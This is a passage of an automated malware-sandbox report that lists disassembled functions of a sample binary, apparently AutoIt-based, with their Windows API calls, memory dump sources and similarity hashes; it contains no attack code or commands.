GetCursorPos.USER32(?), ref: 00ADB855
ScreenToClient.USER32(?,?), ref: 00ADB860

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: a44658b10d23e2f8f76299fe682449bafb0ebf400da101e6fbccdcc4edf89f37
Instruction ID: ef5fe6fab40cd4662fe736620da5a1bc0b742144356f98c775c7f2f5997db9c5
Opcode Fuzzy Hash: a44658b10d23e2f8f76299fe682449bafb0ebf400da101e6fbccdcc4edf89f37
Instruction Fuzzy Hash: D1110A3990011ABFCB11DFA8D985AFE77B8EB06301F100466F911E7291CB34BA56DBA5

Function 00B01652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B001FD,?,00B01250,?,00008000), ref: 00B0166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B001FD,?,00B01250,?,00008000), ref: 00B01694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B001FD,?,00B01250,?,00008000), ref: 00B0169E
Sleep.KERNEL32(?,?,?,?,?,?,?,00B001FD,?,00B01250,?,00008000), ref: 00B016D1

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d50762d3d147aa6a1aea381e1ad42bb30969ece5d0b1a61d1f700fac5562a178
Instruction ID: cc2455dad5a550c5e46bb84aee9faf53c9ef69b4428d3cce0620ddfd5dfa310d
Opcode Fuzzy Hash: d50762d3d147aa6a1aea381e1ad42bb30969ece5d0b1a61d1f700fac5562a178
Instruction Fuzzy Hash: 58115A31C0051DEBCF049FA9DD88AFEBFB8FF09742F4544A9E940B2280CB3155619B96

Function 00AD7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00AD722B

Part of subcall function 00AD7912: __fltout2.LIBCMT ref: 00AD793B

__cftog_l.LIBCMT ref: 00AD7251
__cftoe_l.LIBCMT ref: 00AD7283

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: eeef2973ef3df550d85b3226ca3ebb3214436a41ce3fef5c41194272b8117bb1
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: CF01807204418ABBCF1A5F84CC028EE3F22BF19340B488616FA1958231E237C9B1AB81

Function 00B2B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B2B59E
ScreenToClient.USER32(?,?), ref: 00B2B5B6
ScreenToClient.USER32(?,?), ref: 00B2B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2B5F5

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: f553507cfa63363f4b0c314580f83870c27647b1a600db8195804708ac89e7fa
Instruction ID: d07d11620d25818a092f0d36234531cba0e6540de41238df4e1f2c8cbc988a50
Opcode Fuzzy Hash: f553507cfa63363f4b0c314580f83870c27647b1a600db8195804708ac89e7fa
Instruction Fuzzy Hash: 621134B5D0020AEFDB51CF99D4449EEBBF5FB18310F104166E914E3620D735AA55CF50

Function 00B2B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B2B8FE
_memset.LIBCMT ref: 00B2B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B67F20,00B67F64), ref: 00B2B93C
CloseHandle.KERNEL32 ref: 00B2B94E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 1f47dc2a633822f75cda926ba8c78c0e41272b16e7a1c2bb0bc18802888718d1
Instruction ID: 038d382c2a70b1a2da9a17f797291c1d94b16d87fc99b6e11818601995477422
Opcode Fuzzy Hash: 1f47dc2a633822f75cda926ba8c78c0e41272b16e7a1c2bb0bc18802888718d1
Instruction Fuzzy Hash: EDF05EB35943507BF6106761AC15FBB3A9CEB09358F004070FA08D6192DFBA490087A8

Function 00B06E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00B06E88

Part of subcall function 00B0794E: _memset.LIBCMT ref: 00B07983

_memmove.LIBCMT ref: 00B06EAB
_memset.LIBCMT ref: 00B06EB8
LeaveCriticalSection.KERNEL32(?), ref: 00B06EC8

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: a358f08bf6e884dba466d47d9c8b307e09ac2f1ca96fe8e60b39593135f86219
Instruction ID: 13780b2e2c6ed24d1c661dda8ab83e679ea6794323e88844c2a0896be5f29789
Opcode Fuzzy Hash: a358f08bf6e884dba466d47d9c8b307e09ac2f1ca96fe8e60b39593135f86219
Instruction Fuzzy Hash: B0F0303A200200ABCF116F55DC85E99BB69EF49320B04C065FE085F25ACB31A911CBB4

Function 00B2C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00AA12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA134D
Part of subcall function 00AA12F3: SelectObject.GDI32(?,00000000), ref: 00AA135C
Part of subcall function 00AA12F3: BeginPath.GDI32(?), ref: 00AA1373
Part of subcall function 00AA12F3: SelectObject.GDI32(?,00000000), ref: 00AA139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B2C030
LineTo.GDI32(00000000,?,?), ref: 00B2C03D
EndPath.GDI32(00000000), ref: 00B2C04D
StrokePath.GDI32(00000000), ref: 00B2C05B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: bfb4ee33d53bffc3e8f44c133b1147eacf57a2468cd2acb33697f19d1ef82a00
Instruction ID: ce3305334b596a750643f0b1fb1f4576c562c2e6344637525084741cf839fae9
Opcode Fuzzy Hash: bfb4ee33d53bffc3e8f44c133b1147eacf57a2468cd2acb33697f19d1ef82a00
Instruction Fuzzy Hash: BFF0E93100021AF7DB221F50AC09FDF3FA4AF05711F144021FA11630E28BB54565CFD9

Function 00AFA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AFA399
GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFA3AC
GetCurrentThreadId.KERNEL32 ref: 00AFA3B3
AttachThreadInput.USER32(00000000), ref: 00AFA3BA

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 24e437ad8ae6fe9806d30efeb95f1880c4079fcde96c61102be5e6393410b104
Instruction ID: ecf8a9344e3f5737207f57b0cf778e0aa7a7b1f1031d6ddbc4281f5bd95e913c
Opcode Fuzzy Hash: 24e437ad8ae6fe9806d30efeb95f1880c4079fcde96c61102be5e6393410b104
Instruction Fuzzy Hash: E4E03975541228BADB211FA2DD0CEF73F6CEF267A2F008134F6089A060CA759541DBA0

Function 00AA2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00AA2231
SetTextColor.GDI32(?,000000FF), ref: 00AA223B
SetBkMode.GDI32(?,00000001), ref: 00AA2250
GetStockObject.GDI32(00000005), ref: 00AA2258
GetWindowDC.USER32(?,00000000), ref: 00ADC0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 00ADC0E0
GetPixel.GDI32(00000000,?,00000000), ref: 00ADC0F9
GetPixel.GDI32(00000000,00000000,?), ref: 00ADC112
GetPixel.GDI32(00000000,?,?), ref: 00ADC132
ReleaseDC.USER32(?,00000000), ref: 00ADC13D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 8d23f34ac7c9225d0dce1a40e8814e41dc75d171c3d40bd9880db8d22cc76141
Instruction ID: 5c55759c8c8c76ec601e621b3a57ca15773bbfcf0a809b5909635d47ed648939
Opcode Fuzzy Hash: 8d23f34ac7c9225d0dce1a40e8814e41dc75d171c3d40bd9880db8d22cc76141
Instruction Fuzzy Hash: E1E06D32100246EADB315F78FC0DBE83B30EB15332F448376FA69590E18B7189A1DB12

Function 00AF8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00AF8C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,00AF882E), ref: 00AF8C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AF882E), ref: 00AF8C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,00AF882E), ref: 00AF8C7E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 1af1eb3a6a26d5ee36d3c3c13a20b636784bec647339f5ded2e4c5d55353eca5
Instruction ID: eae56ce3250f0c8ef2153eb735b911c4a1abd2c907e9ee9103c4b161357c8b4d
Opcode Fuzzy Hash: 1af1eb3a6a26d5ee36d3c3c13a20b636784bec647339f5ded2e4c5d55353eca5
Instruction Fuzzy Hash: B1E04F36642212DBD7705FF06D0DB673BB8AF55792F044838B245CB040DE3884438B65

Function 00AE2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00AE2187
GetDC.USER32(00000000), ref: 00AE2191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AE21B1
ReleaseDC.USER32(?), ref: 00AE21D2

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a2026a10badbe68d67b98b71e9b9d84a80a6a644509b6ef6d718cbb846d40eec
Instruction ID: 4ae8f6792b285807fb0d8603a2b23fa5f4405d0cf58a712a1a3c5a8155367d27
Opcode Fuzzy Hash: a2026a10badbe68d67b98b71e9b9d84a80a6a644509b6ef6d718cbb846d40eec
Instruction Fuzzy Hash: 89E01AB5800215EFDB229F60C908AAE7BF5EB4C350F108425F95AD7260DB388142DF40

Function 00AE219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00AE219B
GetDC.USER32(00000000), ref: 00AE21A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AE21B1
ReleaseDC.USER32(?), ref: 00AE21D2

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 453a17d695df79249f8ef26fc62ae4678ecf9c403a9ae2b5904c8db646cc762d
Instruction ID: 526be37301285dad8c59a4882f123090ef07a28cb9d4746d4a1de1e3cdffc26c
Opcode Fuzzy Hash: 453a17d695df79249f8ef26fc62ae4678ecf9c403a9ae2b5904c8db646cc762d
Instruction Fuzzy Hash: EAE01A75800205AFCB229F70C9086AE7BF1EB4C350F108025F95AD7260DB389142DF40

Function 00AFB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00AFB981

Strings

AutoIt3GUI, xrefs: 00AFB8F9
Container, xrefs: 00AFB8FE

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 49f5ba31f8381c08fbdbfa771b65ffe495a3290aabb50de80323afab3ef19af1
Instruction ID: 2cbad55b597a2df61adb279fd628c78aad129ee49f7b42f2875652bf68aa675d
Opcode Fuzzy Hash: 49f5ba31f8381c08fbdbfa771b65ffe495a3290aabb50de80323afab3ef19af1
Instruction Fuzzy Hash: 51912970610605DFDB24DF68C884B6AB7F9BF48750F24856EFA49CB6A1DB70E841CB60

Function 00B0B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00ABFEC6: _wcscpy.LIBCMT ref: 00ABFEE9

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

__wcsnicmp.LIBCMT ref: 00B0B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B0B361

Strings

LPT, xrefs: 00B0B292

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: a343fdc2411bd9661f25f51104f8c22a9963cb08f26ef095f85b6e1e4b014fbd
Instruction ID: d84bd153d2c4c4cdbc19733f86863ebd59fa2745b51f035fb7e91d693a208ed9
Opcode Fuzzy Hash: a343fdc2411bd9661f25f51104f8c22a9963cb08f26ef095f85b6e1e4b014fbd
Instruction Fuzzy Hash: EE615075A00215AFCB14DF94C985EAEBBF4EF09310F1540AAF946AB2A1DB70AE40CB54

Function 00AB2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00AB2AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00AB2AE1

Strings

@, xrefs: 00AB2AD5

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 6ecff0d2c1b05ed9611a5fb83eb7c5fe74e8cf351a8a869654b5f19cc78e66dd
Instruction ID: 67dc64c89a762c878ed8774382f43e814535e60405470d780ad37a1d3c84b930
Opcode Fuzzy Hash: 6ecff0d2c1b05ed9611a5fb83eb7c5fe74e8cf351a8a869654b5f19cc78e66dd
Instruction Fuzzy Hash: 925146715187449BD320AF10D886BABBBF8FF86350F42885DF1D9921A1EF308529CB26

Function 00B099BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00AA506B: __fread_nolock.LIBCMT ref: 00AA5089

_wcscmp.LIBCMT ref: 00B09AAE
_wcscmp.LIBCMT ref: 00B09AC1

Strings

FILE, xrefs: 00B099FA

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
